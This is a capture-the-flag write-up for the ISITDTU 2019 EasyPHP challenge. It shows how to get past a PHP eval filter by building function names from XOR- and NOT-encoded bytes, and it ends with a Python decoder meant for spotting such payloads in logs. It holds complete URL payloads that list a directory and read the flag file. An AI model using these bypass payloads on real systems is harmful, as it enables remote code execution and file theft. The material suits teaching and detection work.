[ISITDTU 2019]EasyPHP
2022-06-11 16:08:00 [Game Programming]
Lately I have been slacking off, not knowing what to do each day and unable to settle down and work on challenges. Today I did this one, and by the end my understanding of it was still fuzzy, so I am writing this writeup to reinforce the knowledge points and consolidate non-alphanumeric RCE. The points this challenge covers are fairly small; to learn more bypass techniques you still need to read the articles by p神 (phith0n).
Open the target machine and you see the source:

```php
<?php
highlight_file(__FILE__);
$_ = @$_GET['_'];
// first check: blocklist of characters (case-insensitive)
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
    die('rosé will not do it');
// second check: at most 13 (0xd) distinct characters after lowercasing
if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
    die('you are so close, omg');
eval($_);
?>
```

The source means: get past the two ifs, and eval then executes the command.
The first regex:

- \x00- 0-9 matches \x00 through space (\x20) and the digits 0-9
- '"`$&.,|[{_defgops\x7F matches the characters '"`$&.,|[{_defgops and the DEL character (\x7F); because of the /i flag the letters d, e, f, g, o, p, s are blocked in upper case as well

The second check: count_chars() returns information about the characters used in a string (in mode 3 it returns a string containing every distinct character that appears in the argument). In other words, there may be no more than 13 distinct characters.

First use the script below to look for built-in functions that satisfy both checks; after reviewing the output, no usable function was found:

```php
<?php
$array = get_defined_functions(); // returns all defined functions; built-ins are under 'internal'
foreach ($array['internal'] as $arr) {
    // same two checks as the challenge: skip any name either of them rejects
    if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $arr) ) continue;
    if ( strlen(count_chars(strtolower($arr), 0x3)) > 0xd ) continue;
    print($arr.'<br/>');
}
?>
```
Here we try to bypass the checks with bitwise NOT (~) or XOR. First try phpinfo():

```shell
php -r "echo urlencode(~'phpinfo');"
```

From the information obtained you can see that most functions are filtered, so print_r(scandir(.)) is used to read the directory:

(~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)(~%D1));

This turns out not to get past the second check. To make substitution easier, switch to the XOR-with-%FF form and combine it with substitution; print_r(scandir(.)) becomes:

((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

By this point I had run out of patience and went straight to a master's article: [ISITDTU 2019]EasyPHP_fmyyy1的博客-CSDN博客. First test the length locally:

```php
<?php
// Same count as the challenge's second check: number of distinct bytes (count_chars mode 3)
$_ = $_GET['_'];
echo strlen(count_chars(strtolower($_), 3));
```

The length comes out as 16, so it has to be reduced by 3. Apply the substitution method from that article directly:

```python
# Express each of the letters n, t, r as the XOR of three characters that are
# already present in the payload, so that no new distinct byte is introduced.
chars = 'acdips'
target = 'ntr'
for m in target:
    for a in chars:
        for b in chars:
            for c in chars:
                if ord(a) ^ ord(b) ^ ord(c) == ord(m):
                    print("{} = {}^{}^{}".format(m, a, b, c))
```

This gives n = c^d^i, t = c^d^s, r = a^c^p. Since every negated byte ~x equals x^0xFF, XORing three negated bytes with the trailing %FF gives back c^d^i = n (and likewise for t and r) using only bytes that are already in the payload.

Taking print_r as the illustration: (%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF) with the bytes for n, t, r substituted becomes:

(%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)

The payload after substitution is:

((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

Testing the length gives 13, which meets the requirement. The payload is:

?_=((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

The flag is the last element of the array, so use readfile(end(scandir(.))) to read it, constructed in the same way. The final payload is:

?_=((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));
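To see exactly what the two checks do, and to decode payloads of this shape when they turn up in web-server logs, here is a Python analysis script added to this writeup (it is neither the challenge's code nor the original author's). It re-implements the preg_match blocklist and the count_chars distinct-byte check from the challenge source above, then decodes every ~-negated or ^-chained operand group in a percent-encoded payload back to the function name it evaluates to, which is the check the local length test and the substitution step rely on. The payload strings are the ones quoted in this writeup; `analyse`, `decode_xor_chains` and the other names are my own.

```python
import re
from functools import reduce
from urllib.parse import unquote_to_bytes

# Same character class as the challenge's preg_match; '[' is escaped only because
# Python's re warns about a bare '[' inside a class. The set of bytes is unchanged.
FILTER_RE = re.compile(rb'[\x00- 0-9\'"`$&.,|\[{_defgops\x7F]+', re.IGNORECASE)
MAX_DISTINCT = 0xD  # strlen(count_chars(strtolower($_), 3)) must not exceed 13


def blocked_by_regex(payload: bytes) -> bool:
    """First check: one byte from the blocklisted class rejects the whole input."""
    return FILTER_RE.search(payload) is not None


def distinct_chars(payload: bytes) -> int:
    """Second check: count_chars(..., 3) yields every distinct byte once.
    bytes.lower() folds ASCII letters only, like strtolower on a byte string,
    so bytes >= 0x80 stay distinct from each other."""
    return len(set(payload.lower()))


def passes_filter(payload: bytes) -> bool:
    return not blocked_by_regex(payload) and distinct_chars(payload) <= MAX_DISTINCT


# One operand group: optional '(', optional '~', percent-encoded bytes, optional ')'.
# A chain is one group or several joined by '^', e.g. (%8F%9E)^(%FF%9C) or %D1^%FF.
_OPERAND = r'\(?~?(?:%[0-9A-Fa-f]{2})+\)?'
_CHAIN = re.compile(rf'{_OPERAND}(?:\^{_OPERAND})*')


def _operand_bytes(op: str) -> bytes:
    op = op.strip('()')
    if op.startswith('~'):  # PHP's ~ on a string complements every byte
        return bytes((~b) & 0xFF for b in unquote_to_bytes(op[1:]))
    return unquote_to_bytes(op)


def decode_xor_chains(url_payload: str) -> list:
    """Return the plaintext each operand chain in the payload evaluates to.
    PHP's string XOR truncates to the shorter operand; zip() does the same."""
    decoded = []
    for m in _CHAIN.finditer(url_payload):
        operands = [_operand_bytes(op) for op in m.group(0).split('^')]
        xored = reduce(lambda a, b: bytes(x ^ y for x, y in zip(a, b)), operands)
        decoded.append(xored.decode('latin-1'))
    return decoded


def analyse(url_payload: str) -> dict:
    """Run both checks on the URL-decoded payload and show what it decodes to."""
    raw = unquote_to_bytes(url_payload)
    return {
        'decoded': decode_xor_chains(url_payload),
        'distinct': distinct_chars(raw),
        'blocked_by_regex': blocked_by_regex(raw),
        'passes': passes_filter(raw),
    }


# Payloads quoted in the writeup above, in the order they were tried.
NEGATED = '(~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)(~%D1));'
XOR_FF = ('((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))'
          '(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));')
XOR_13 = ('((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)'
          '^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)'
          '^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));')
FINAL = ('((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))'
         '(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))'
         '(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)'
         '^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));')

if __name__ == '__main__':
    for name, p in [('negated', NEGATED), ('xor %FF', XOR_FF),
                    ('xor, 13 distinct', XOR_13), ('final', FINAL)]:
        print(name, analyse(p))
    print('literal', analyse('phpinfo();'))
```

Running it shows the negated form decoding to print_r / scandir / . with 15 distinct bytes, the plain XOR-with-%FF form with 16, and the substituted forms with 13, which is why only the last two get past the second check. The decoder is the part worth keeping: a blocklist regex plus a distinct-character budget says nothing about what a string evaluates to, so a detection rule for this endpoint should look at the decoded operand chains (or simply at the density of bytes above 0x7F in a parameter that feeds eval) rather than at literal function names.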
Author: ahik1